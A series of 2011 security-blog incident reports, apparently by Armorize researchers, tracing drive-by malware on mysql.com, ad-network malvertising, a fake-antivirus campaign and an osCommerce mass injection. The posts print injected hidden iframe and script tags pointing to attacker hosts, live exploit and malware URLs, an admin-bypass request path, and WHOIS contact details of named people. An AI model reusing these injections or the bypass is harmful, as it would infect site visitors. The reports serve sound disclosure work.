mysql.com hacked, infecting visitors with malware

Posted by: Wayne Huang on 9.26.2011 / Categories: /
(Credit: Wayne Huang, Chris Hsiao, NightCola Lin)
Our HackAlert 24x7 Website malware monitoring platform today indicated that mysql.com has been hacked and is currently serving malware. The highlighted section of the above screenshot is the injected script. Below is a video showing how visitors are infected when navigating to the site:


[Infection Chain]

Step 1: http://www.mysql.com

Causes the visiting browser to load the following:

Step 2: http://mysql.com/common/js/s_code_remote.js?ver=20091011

This is the injection point. The entire content of the above .js file can be found here.

The injected section is shown in the above screenshot. The decoded version is as follows:
The text version is available here. This script generates an iframe to Step 3.

Step 3: http://falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/

Throws out a 302 redirect to Step 4.

Step 4: http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php

This domain hosts the BlackHole exploit pack. It exploits the visitor's browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java, ...), and upon successful exploitation, permanently installs a piece of malware into the visitor's machine, without the visitor's knowledge. The visitor doesn't need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.

Currently, 4 out of 44 vendors on VirusTotal can detect this piece of malware.


[The Attacker]

We don't know much at this point. The following are information regarding the associated malicious domains.

falosfax.in (Step 3)
Address: 212.95.63.201
Location: Germany / Berlin
Created On:20-Jun-2011 13:17:05 UTC
Sponsoring Registrar:Transecute Solutions Pvt. Ltd. (R120-AFIN)
Registrant Name:CHRISTOPHER J KLEIN
Registrant Street1:7880 SW 132 STREET
Registrant City:MIAMI
Registrant State/Province:Florida
Registrant Postal Code:33156
Registrant Country:US
Registrant Phone:+1.3053771635
Registrant Email:cjklein54@yahoo.com
Admin ID:TS_14483505
Admin Name:CHRISTOPHER J KLEIN
Admin Organization:N/A
Admin Street1:7880 SW 132 STREET
Admin Street2:
Admin Street3:
Admin City:MIAMI
Admin State/Province:Florida
Admin Postal Code:33156
Admin Country:US
Admin Phone:+1.3053771635
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:cjklein54@yahoo.com
Tech Email:cjklein54@yahoo.com
Name Server:NS1.SKYNS1.NET
Name Server:NS2.SKYNS1.NET

truruhfhqnviaosdpruejeslsuy.cx.cc (Step 4)
Address: 46.16.233.108
Location: Sweden / Stockholm

The mysql.com website is as of now, still serving this exploit and malware.

We're in the process of contacting mysql.com. If anyone have contacts to them, please drop us an email at wayne@armorize.com

PS: Armorize is hiring presales in the bay area: http://www.linkedin.com/jobs/post?displayJobStatus=&jobId=1910971&split_page=1
Read more (rest of article)...

Malvertising on Yahoo YieldManager, spreading ransomeware acting as Federal German Police (BKA)--Help solve the puzzle!

Posted by: Wayne Huang on 8.31.2011 / Categories: , , /
Help us solve the puzzle!
(credits: Wayne Huang, Chris Hsiao, NightCola Lin)

Over the past few days, our HackAlert scanning farm has constantly detected malvertising on Yahoo YieldManager (RightMedia). Since YieldManager is one of the world's largest ad networks, websites worldwide, big and small, have all been hit. Fortunately, the exploit server is only serving the malware to German visitors.

In our following video, we demonstrated how Ziddu was thus infected to serve this German ransomware to its visitors. According to CheckSiteTraffic.com, Ziddu enjoys 1,492,133 page views and 364,825 unique visitors per day.

The malware pretends to be a crime-detection software from the Federal German Police. It claims to have found child pornography along with other illegal content on the victim's computer. It claims that the victim's IP, OS, location, ISP, etc, have all been recorded, and locks down the computer completely, "to prevent further abuse."

A fine of 100 Euros must be paid within 24 hours to unlock the computer, or else all data will be deleted. We are in the process of informing all parties involved. This is our report.
(Above: ziddu.com hit by malvertising on Yahoo YieldManager (RightMedia)

(Above: Even Japanese sites were hit)

(Above: The installed Ransomeware--acting as Federal German Police (BKA))


Below is our video report:


Table of contents
[Summary]
[Attack Trace]
[Malvertising Analysis--The Puzzle]
[The malware]

[Summary]

Incident type: Malvertising
Incident subtype: Drive-by download, ransomware
Responsible ad network: Yahoo YieldManager (RightMedia)
Affected websites: Very large websites like ziddu.com to worldwide websites large and small. Ziddu for example has 1,492,133 page views and 364,825 unique visitors per day.
Affected visitors: German visitors only
Fake advertiser: kineticgames.info
Exploit server: BlackHole exploit pack running on town.incredibleoutcomes.com
Malicious domains:
kineticgames.info (184.172.216.234, ASN 36351, US Dallas)
sahoreen.in (184.172.216.234, ASN 36351, US Dallas)
belygaur.in (184.172.216.234, ASN 36351, US Dallas)
town.incredibleoutcomes.com (195.200.90.129, ASN 35524, Ukraine)
bundespol.net (188.229.97.2, ASN 44872, Romanina)

Associated names and emails:
einzahlung@bundespol.net
Vasiliy Pushkin, vasili006@gmail.com
Piotr Pushkin, pppiotr88@gmail.com

[Attack Trace]
Using ziddu.com as example.

Link 1: (Publisher)
Ziddu's website includes the following ad tag:
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 SRC="http://ad.globe7.com/st?ad_type=iframe&ad_size=728x90&section=836122"></IFRAME>
Link 2: (Ad Network) http://ad.globe7.com/st?ad_type=iframe&ad_size=728x90§ion=836122 is loaded, which contains javascript that generates an iframe to:

Link 3: (Ad Network) http://ad.globe7.com/imp?Z=728x90&s=836122&_salt=2314211323&B=10&u=http%3A%2F%2Fwww.ziddu.com%2F&r=0, which throws back an HTTP 302 redirect to:

Link 4: (Ad Network) http://ad.yieldmanager.com/imp?Z=728x90&s=836122&_salt=2314211323&B=10&u=http%3A%2F%2Fwww.ziddu.com%2F&r=0, which contains javascript that generates an iframe to:

Link 5: (Ad Network) http://ad.globe7.com/iframe3?2YA.ABrCDABgVKUAAAAAAMWJKAAAAAAAAgAEAAYAAAAAAP8AAAACBvPdGQAAAAAAIrsPAAAAAACYIzUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZlQYAAAAAAAIAAwAAAAAAASuHFtnOtz8BK4cW2c63PwErhxbZzsc.ASuHFtnOxz8zMzMzMzPTPzMzMzMzM9M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACkuxJPXfCjCqRit3MeuQtEnvXOi1a6Cp0X0hsNAAAAAA==,,http%3A%2F%2Fwww.ziddu.com%2F,B%3D10%26Z%3D728x90%26_salt%3D2314211323%26r%3D0%26s%3D836122,a5451910-d1f1-11e0-906f-87d5341e0e89, which throws an HTTP 302 redirect to:

Link 6: (Ad Network) http://ad.yieldmanager.com/iframe3?2YA.ABrCDABgVKUAAAAAAMWJKAAAAAAAAgAEAAYAAAAAAP8AAAACBvPdGQAAAAAAIrsPAAAAAACYIzUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZlQYAAAAAAAIAAwAAAAAAASuHFtnOtz8BK4cW2c63PwErhxbZzsc.ASuHFtnOxz8zMzMzMzPTPzMzMzMzM9M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACkuxJPXfCjCqRit3MeuQtEnvXOi1a6Cp0X0hsNAAAAAA==,,http%3A%2F%2Fwww.ziddu.com%2F,B%3D10%26Z%3D728x90%26_salt%3D2314211323%26r%3D0%26s%3D836122,a5451910-d1f1-11e0-906f-87d5341e0e89, which contains javascript that a) displays the malicious ad, and b) generates an iframe to the exploit server. Note the iframe URL ends with .jpg in order to disguise and be less obvious.
(full copy-able text can be found on snipt here>
Link 7-a: (Fake Advertiser, Creative) http://kineticgames.info/images/728x90-1-1.gif, which is the actual malicous creative (malvertisement).
Link 7-b: (Fake Advertiser, malicious script) http://kineticgames.info/pubage/728x90.jpg, although the URL ends in .jpg, it's actually serving HTML containing an iframe pointing to:

Link 8: (Malicious redirector) http://sahoreen.in/hitcounter.php?u=pubage, which contains an iframe pointing to:

Link 9: (Malicious redirector) http://belygaur.in/ts/in.cgi?pubage, which throws an HTTP 302 redirect pointing to the exploit server:

Link 10: (Exploit server) http://town.incredibleoutcomes.com/index.php?tp=7058439543afabcf, serves BlackHole exploit pack. This isn't a malicious domain registered by the attacker, but a legitimate but compromised domain.

[Malvertising Analysis--The Puzzle]

Below are some causes of malvertising:

a) The attacker pretends to be a legitimate advertiser, submits a malicious ad (malvertisement) to an ad network, and tricks the ad network into accepting the submission.

b) The ad network was compromised, and the attacker injected malicious scripts into a link in the ad-serving chain.

So which case is this? Well for this particular case, it was a bit difficult for us to determine.

Upon first look, it seems to be case (a), because the advertiser in this case--kineticgames.info (184.172.216.234, ASN 36351, US Dallas), has a whois record with a Russian name and street address, yet is using an US IP and an Indian domain name for its name server (ns1.plumdook.in).

HOWEVER, the domain was registered on Aug 9th, 2010, which was a year ago, and from the screenshot below you can see that it sees to be quite a legitimate website:
Compared to many malvertising incidents we've studied, most fake domains will have been registered very recently and will either not have any website content, or will have content illegally mirrored (copied) from other websites.

This doesn't seem to be the case. So, is it case (b), where kineticgames.info is indeed a legitimate website, but have been compromised to serve malvertisements?

Seems reasonable, but only until we look at the other associated malicious domains. These are:

sahoreen.in (184.172.216.234, ASN 36351, US Dallas)
belygaur.in (184.172.216.234, ASN 36351, US Dallas)

These two domains were both created very recently, on the same day--July 7th, 2011. The whois records show the registrant to be "Piotr Poshkin," which resembles kineticgames.info's current "Vasiliy Pushkin." Furthermore, the phone number, street address, and zip codes are exactly the same as kineticgames.info's.

Kineticgames.info actually has a sister domain name: kinetic-games.com, registered on the same day last year (Aug 9th, 2010), and serving the same content. Both were initially registered under Bob Stevenson of Spain. Then, on July 14th and July 17th, 2011, kinetic-games.com and kineticgames.info were respectively transfered to the current contact (according to whois records) "Vasiliy Pushkin" of Russia.

Could it be, that it is the new owner, who is intentionally doing malvertising using these domains and the website, because the identity is seemingly legit?

Or could it be, that none of these matters, and that kineticgames.info simply have been hacked into and the attackers used it to submit malvertisement, and intentionally registered the malicious redirector domains sahoreen.in and belygaur.in to have whois records that resemble that of kineticgames.info?

Finally, two additional pieces of important information. First, according to Internet Archive (Wayback Machine), as of Jan 28th, 2011, kinetic-games.com had no actual website content--the owner was just registering the domain to sell as a premium domain:

Second, the website as of now, contains lots of vulnerabilities. It should be quite easy for someone to hack into both websites.

So what's the deal here?

We cannot make a conclusion right here. Perhaps the reader can help solve the puzzle?

[The Malware]

The malware pretends to be a crime-detection software from the Federal German Police. You can see in the screenshot above, it's using logo stolen from the real Federal German Police (Bundespolizei). It claims to have found child pornography along with other illegal content on the victim's computer. It claims that the victim's IP, OS, location, ISP, etc, have all been recorded, and locks down the computer completely, "to prevent further abuse."

A fine of 100 Euros must be paid within 24 hours to unlock the computer, or else all data will be deleted. We are in the process of informing all parties involved. This is our report.

This thread of ransomware has been around for a few months already, but improvements seen in this version include:

a) They now have an email "einzahlung@bundespol.net" that somewhat resembles the Federal German Police, who uses "@bundespolizei.de. The domain was registered through Bizcn.com, a registrar in China.

b) They now support two payment gateways, UKash and paysafecard.

Below is a translation of the text:

Attention!

Illegal operational activities have been detected. Based on laws of the Federal Republic of Germany, the system has been locked. The following legal violation has been detected: Your IP _______ was detected to have visited pages containing pornography, child pornography, bestiality and violence against children. At the same time, your computer has been identified to contain video files involving pornography, violence, and child pornography content! Furthermore, spam emails containing terrorism content were also sent from here. Your computer is therefore locked in order to eliminate the above illegal activities.

Your details:
IP, location, OS, ISP, etc.

In order to unlock this computer, you are obligated by law to pay a 100 Euro fine. You must make the payment within 24 hours. If payment has not been made within the allotted time, your hard disk will be irreversibly formatted.

1) Payment via Ukash:

To perform the transaction, please enter your purchased voucher code into the payment textbox and press OK. In case of errors, you should email your code to einzahlung@bundespol.net.

2) Payment via paysafecard:

Please input the code into the payment textbox and press OK. In case of errors, you should email your code to einzahlung@bundespol.net.
Read more (rest of article)...

Malvertising on Google Doubleclick ongoing

Posted by: Wayne Huang on 8.25.2011 / Categories: , , /
(credits: Wayne Huang, Chris Hsiao, NightCola Lin)

In the past few days, our scanners noticed malvertising on Google DoubleClick. The malvertisement is being provided to DoubleClick by Adify (Now a part of Cox Digital Solutions), and to Adify by Pulpo Media, and to Pulpo Media by the malicious attackers pretending to be advertisers: indistic.com. The malvertisement causes visitor browsers to load exploits from kokojamba.cz.cc (the exploit domain), which is running the BlackHole exploit pack. Currently, 7 out of 44 vendors on VirusTotal can detect this malware.

This is our report. We plan to put up the video later--we still need to narrate it, which will take some time. As DoubleClick is a very large AD network, we decided to put up the post quickly.

The first link in the infection chain is the following standard script for all websites using Google DoubleClick for Publishers (Google DFP):

(Link 1:)
<script type='text/javascript' src='hxxp://partner.googleadservices.com/gampad/google_service.js'>

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 2:)
http://partner.googleadservices.com/gampad/google_ads.js

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 3:)
http://pubads.g.doubleclick.net/gampad/ads?correlator=1314244145446&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-1199834677431615&slotname=LA_PRENSA_Poderes_728x90_Superior&page_slots=LA_PRENSA_Poderes_728x90_Superior&cookie=ID%3D6ece38c99f627779%3AT%3D1314244080%3AS%3DALNI_MbRwmcAoAFohCjkKxnj_JXcxZEUEA&url=http%3A%2F%2Fwww.laprensa.com.ni%2F2011%2F08%2F23%2Fpoderes&lmt=1314244147&dt=1314244147962&cc=100&oe=utf-8&biw=878&bih=477&ifi=1&adk=2910702588&u_tz=480&u_his=2&u_java=true&u_h=1920&u_w=1080&u_ah=1892&u_aw=1080&u_cd=32&flash=10.1.102.64&gads=v2&ga_vid=2122880267.1314244061&ga_sid=1314244061&ga_hid=187578555&ga_fc=true

Which generates a <script src> tag, causing the browser to load javascript from Adify (Now a part of Cox Digital Solutions):

(Link 4:)
http://ad.afy11.net/srad.js?azId=1000004110207

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 5:)
http://ad.afy11.net/ad?asId=1000004110207&sd=2x728x90&ct=15&enc=1&nif=1&sf=0&sfd=0&ynw=0&anw=1&rand=55943306&rk1=56285031&rk2=1314244149.806&pt=0&asc=3x133&vad=878x477

Which generates an iframe, causing the browser to load javascript from tentaculos.net, which is a part of Pulpo Media:

(Link 6:)
http://d1.tentaculos.net/afr.php?zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE

Which gives an HTTP 302 redirect to:

(Link 7:)
http://d1.tentaculos.net/afr.php?ct=1&zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 8:)
http://indistic.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=142038917

This is the malicious advertiser. The above javascript generates an iframe, causing the browser to load from the exploit domain kokojamba.cz.cc (Link 9-a), and also the creative (the banner ad) itself (Link 9-b) as a .png file. Here's a snippet of this javascript:


The entire javascript code can be found here.

The domain "indistic.com" was registered on Aug 12, 2011 (evidence 1) by "Marcene D. Rohodes (marcenedrhodessm@yahoo.com). The domain currently runs on IP 95.64.46.84 (AS49734) (thank you Jason D.Seimesi), which is located in Romania. The whois records show a US street address but with a Lithuania phone number and a Romanian IP (evidence 2):

=====================================
Administrative Contact:
Name: Marcene D. Rhodes
Organization: no
Address: 4653 Twin House Lane
City: Mount Vernon
Province/state: MO
Country: US
Postal Code: 65712
Phone: +370.956734778
Fax: +370.956734778
=====================================

The domain is using FreeDNS on freedns.afraid.org (evidence 3).

So there were at least three evidences here, that indistic.com wasn't a legitimate advertiser. This malvertisement shouldn't have been let into this chain of AD networks.

Furthermore, as (Jason D.Seimesi pointed out, the same IP is also used by pisofta.com--another domain also registered on Aug 12. Therefore there should be more than one malicious advertiser identify associated with this effort.

(Link 9-a, BlackHole exploit pack:)
http://kokojamba.cz.cc/index.php?tp=2733de342143bbc7

kokojamba.cz.cc is the exploit domain running the BlackHole exploit pack. It is currently running on IP 178.238.36.64, located in Jihomoravský kraj of Czech Republic.

(Link 9-b:)
http://indistic.com/crt/1Npstr/728.PNG

Currently, 7 out of 44 vendors on VirusTotal can detect this malware:

We are in the process of informing all parties involved. If you know more about this incident, please email us at wayne@armorize.com
Read more (rest of article)...

k985ytv mass compromise ongoing, spreads fake antivirus

Posted by: Wayne Huang on 8.17.2011 / Categories: , , , , /
(Credits: Wayne Huang, Chris Hsiao, NightCola Lin)

On August 14, we started to see mass compromise of websites to inject malicious iframes that spread fake antivirus malware. The attack is ongoing, and this is our report.

[Table of Contents]

[1. Summary]
[2. The visitor infection process]
[3. The fake antivirus being spread]
[4. Sample FTP logs of infected websites]
[5. Sample list of infected websites and screenshots of some of them]

[1. Summary]

1. Initial detection date: August 14.
2. Number of infected website: We estimate at least 22,400 unique DOMAINS. The attackers' first attempt was not successful and therefore google indexed more than 536,000 infected pages. However, since then the attackers have fixed the injected pattern and therefore the injected script is executed rather than displayed. Google therefore does not index infected websites any longer.
3. Injected scripts:
Initially (no <script> tag and therefore indexed by Google):
Full text of above is here on pastebin.

Later, it quickly became one of the following (with <script> tag and therefore works)
Full text of above is here on pastebin.
Full text of above is here on pastebin.

4.Browser Exploitation: Drive-by download script served by a modified version of the BlackHole exploit pack.

5. Malware: Fake antivirus, different names in different OS: "XP Security 2012" under Windows XP, "Vista Antivirus 2012" under Windows Vista, and "Win 7 Antivirus 2012" under Windows 7.

6. Injection method: Primarily via stolen FTP credentials, and then use automated program to FTP, retrieve files, inject iframe, and upload back. FTP credentials are stolen from personal Windows computers that have been infected with malware. Malware searches stored password files of FTP clients and also sniffs the FTP traffic. Stolen credentials are sent back to the attackers.

7. Malicious domains and IPs:
Redirectors:
1. hysofufewobe.com (ex: http://hysofufewobe.com/k985ytv.htm)
2. zirycatum.com (ex: http://zirycatum.com/k985ytv.htm)
3. numudozaf.com (ex: http://numudozaf.com/k985ytv.htm)

Above all resolve to the same Moldova (south of Ukraine)IP: 178.17.163.92, registered under the name of "Alexandr S Grebennikov," on July 25.

Exploit servers:
1. jbvnhw.com (ex: http://jbvnhw.com/i87yta.htm)
2. mlvurp.com (ex: http://mlvurp.com/i87yta.htm)
3. rprlpb.com (ex: http://rprlpb.com/i87yta.htm)
4. efnxkg.com (ex: http://efnxkg.com/i87yta.htm)

All resolves to US IP: 69.50.202.74 (AS18866), belonging to Atjeu Website Hosting. All exploit domains were registered under name "Alardo Macias" on August 14.

8. Antivirus detection rate: Currently 5 out of 43 on VirusTotal:

[2. The visitor infection process]

To show how visitors are infected and how we can analyze the infection, we've made the following video:


[3. The fake antivirus being spread]

The Fake AV displays different names in different OS: "XP Security 2012" under Windows XP, "Vista Antivirus 2012" under Windows Vista, and "Win 7 Antivirus 2012" under Windows 7. Below are some screenshots:

[4. Sample FTP logs of infected websites]

204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "LIST /example.com/ftp/" 226 11862
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "TYPE I" 200 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "PASV" 227 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "SIZE index.htm" 213 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "RETR index.htm" 226 12573
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "TYPE I" 200 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "PASV" 227 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "STOR index.htm" 226 13018

[5. Sample list of infected websites and screenshots of some of them]


uwpagina.nl
mydesert.com
paramountcommunication.com
freebloggiveaways.com
sikhsangeet.com
thenewcivilrightsmovement.com
shakeshack.com
greenandcleanmom.org
noor7.us
restorationsos.com
gopusanj.com
amateurmodelsite.com
animationblogspot.com
accessoryworld.net.au
advancedwaterfilters.com
autoventa.com.bo
usgoldbuyers.com
kharidani.biz
nwp4life.com
chicagofree.info
howwazyourweekend.com
marinerslearningsystem.com
articleolive.com
pitchanything.net
toysonics.com
diaperdecisions.com
realtimedesigner.com
group-games.com
coffeebreakwithlizandkate.com
tvtopten.com
la-zen.com
mountainmaids.com
healthlady.com
articleality.com
shophenna.com
lifescircle.info
xmworks.com
articleoncall.com
trainace.com
grupo20.com
tinkfanatic.com
metrokingpc.ca
rapidgiveawayprofits.com
icebreakers.ws
9y3h.com
miamitvchannel.com
beemaster.com
buydropstop.com
freeautoblogger.com
bid4agents.com
interstateplastics.com
b3bootcamp.net
bestbuyuniforms.com
antigravityinc.com
azholisticchamber.com
root-h.org
affiliateplrmarketing.com
justinmichie.com
cyberbullyingreport.com
creativeblogsolutions.com
advancedfanpagesolutions.com
sungrubbies.com
homewiththeboys.net
marsvenus.com
nhwellnesscenters.com
universityfashions.com
bandjob.com
atmananda.com
flyl4l.com
filmyforum.com
iftn.ie
rjharris2012.com
heppellmedia.com
unionsquarecafe.com
vatanfilm.co.cc
statebrief.com
daylabor.org
affnet.com
passingthru.com 906065,775885.net
khojit.com.au
listacquisition.com
vestalwatch.com
printedblindsfactory.com
oauq.org
theoriginalrudebitch.com
quickcash4.us
intraligilaw.ca
ohswekenspeedway.com
autosenbolivia.net
cityclassifiedsads.com
keepingmeposted.com
henckengaines.com
sportsmatchmaker.com
premiereworks.com
ahyasalam.com
sandiegoduilawyer.com
wecravegamestoo.com
vodkasobieski.com
itrmagictricks.com
f1racefactory.com
epoquehotels.us
freakshowvideo.com
write-solution.com
hydrocephaluskids.org
intersectioncapital.com

killzonezero.com
www.en.chosenfewurbano.com
www.generalmoly.com
www.pinnint.com
www.hiphop.org
www.fiftysevendegrees.com
spbaseball.org
www.ohiogisociety.org
www.senjomartialarts.com
www.assignmentproof.com
tulakesbaptist.com
www.generalmoly.com
www.balboaparkdancers.org
sho-ryders.com
www.azholisticchamber.com
www.ajseatery.com
www.thegrangelifestylevillage.com.au
www.north-fayette.com
tilos.com
www.parteen-gaa.com
www.hawaiiancouncil.org
www.levi-catering.com
sbnmarble.com
sayanythingblog.com
cincyshopper.com
www.fiftysevendegrees.com
www.cincygardens.com
www.freeridesurfshop.com
sayanythingblog.com
steve-watt.com
www.thacoshammer.info
www.stevenjackson.net
www.dearborndumpsterrental.com
basementrejects.com
www.hawaiiancouncil.org
www.frostbrothersentertainment.net
www.levi-catering.com
www.chicagodumpsterrental.org
www.center44.com
sbnmarble.com
www.chicagodumpster.org
buysomenow.com
www.noinkonyourfingers.com
www.nashvilledesign.com
photocrystal.biz
www.momsclubofbranchburg.org
www.cardboardrecycling.freedumpsterrental.com
www.atlantadumpster.org
designresumes.com
www.fiftysevendegrees.com
3millionfans.com
lpmndc.org
www.bugfreeservices.com
ibvsct.com
Read more (rest of article)...

Willysy osCommerce injection: Over 6 million infected pages (update: now over 8 million) and a new video with new tools to do the analysis

Posted by: Wayne Huang on 8.03.2011 / Categories: , , , /
(update: infection numbers are now over 8 million, see original post for updates>
With the number of infected pages now over 6 million, we've again updated our initial report on this willysy mass injection incident. We've also included in it the following new video, in which we used an internal tool to help make the malware analysis process more clear:



Thank you so much for those of you that sent us information--IPs, logs, etc. Sorry we're still analyzing them, but will post new update shortly!
Read more (rest of article)...

willysy.com mass injection has hit more than 3.8 million pages (update: now > 8 million)

Posted by: Wayne Huang on 7.31.2011 / Categories: , , , , /
(update: the infection number is over 6 million now as of Aug 3rd)

On July 24th, we published our initial report on this willysy mass injection incident, which at that time hit around 90,000 pages.

As of July 31th, Google shows more than 3,410,000 (willysy) + 386,000 (exero) = 3.8 million infected pages. Note this number is for individual infected pages, not sites or domains.

And so we've largely updated and reformatted (so new info appears at the front) the initial report, adding to it the infection number, source IP of attack, log entries, osCommerce vulnerabilities used, and more. Please go there and have a look, thanks!
Read more (rest of article)...

willysy.com Mass Injection ongoing, over 8 million infected pages, targets osCommerce sites

Posted by: Chris on 7.25.2011 / Categories: , , , , /
(Credits: Wayne Huang, Chris Hsiao, NightCola Lin, Sun Huang, Crane Ku)
(Initial post: July 24th)
(Updated: July 30th with new infection number, source IP of attack, log entries, osCommerce vulnerabilities used, and more)
(Updated: Aug 3rd with new video and new infection count: >6 million)
(Updated: Aug 8th with new infection count: >8 million)
[Table of contents]
1. Summary
2. Attack Timeline
3. Source of Attack
4. Vulnerabilities Targeted
5. What Happens to Affected Websites
6. Remediation
7. Infection Details
8. Screenshots

[1. Summary]
1. Number of infections:
As of Aug 3rd, Google shows more than 7,690,000 (willysy) + 629,000 (exero) = 8.3 million infected pages. Note this number is for individual infected pages, not sites or domains.

2. Injected iframe:
initially it was:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
Later it became:
<script src=http://exero.eu/catalog/jquery.js></script>

3. Attacker:
Ukraine IPs: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214 (all AS47694). Agent string: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

4. Target and website vulnerability:
osCommerce sites, using at least the following vulnerabilities: osCommerce Remote Edit Site Info Vulnerability, osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability, and Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass.

5. Browser exploits used:
CVE-2010-0840 -- Java Trust
CVE-2010-0188 –- PDF LibTiff
CVE-2010-0886 -– Java SMB
CVE-2006-0003 -– IE MDAC
CVE-2010-1885 – HCP

6. Exploit domain:
arhyv.ru, counv.ru
Date of registration: July 20th
Registered by: leshkinaira@yahoo.com
IP: 46.16.240.18 (AS51632 Ukrain - Inet Ltd)
Related domains: xlamv.ru, vntum.ru

7. Malware URL:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot

[2. Attack Timeline]

July 10th -- "Angel Injection" write about "osCommerce Remote Edit Site Info Vulnerability" (here, here).

July 11th -- Attacker group starts to test exploitation.
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com/admin/configuration.php/login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

July 20th -- Attacker registers the exploit domains arhyv.ru and counv.ru, using email: leshkinaira@yahoo.com

July 23rd -- Attack launched injects the "Store Name" variable:
178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

Injected iframes pointed to two domains,
initially:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
and later:
<script src=http://exero.eu/catalog/jquery.js></script>

July 24rd -- Initial writeup of this report, at the time there was only 90,000 infected pages:

July 31th -- Google shows more than 3,410,000 (willysy) + 386,000 (exero) = 3.8 million infected pages.
Bing, on the other hand, shows 1.8 million infected pages for willysy:

Aug 3rd -- Google shows more than 5,820,000 (willysy) + 497,000 (exero) = 6.3 million infected pages

Aug 7th -- Google shows more than 7,690,000 (willysy) + 629,000 (exero) = 8.3 million infected pages.
[3. Source of Attack]

Several IPs have been identified: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214, all of which belong to AS47694. These IPs should be located in Ukraine, and belongs to the ISP www.didan.com.ua.

The attackers used the following agent string:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)

If you have logs or know other IPs that you can share, please send them to Wayne at email: wayne@armorize.com.

[4. Vulnerabilities Targeted]

This attack targets osCommerce websites and leverages several osCommerce vulnerabilities, including osCommerce Remote Edit Site Info Vulnerability, disclosed July 10th, 2011, osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability, disclosed May 14, 2011, and Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass, disclosed May 30, 2010.

Below are some sample log entries:
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:07 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 21883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

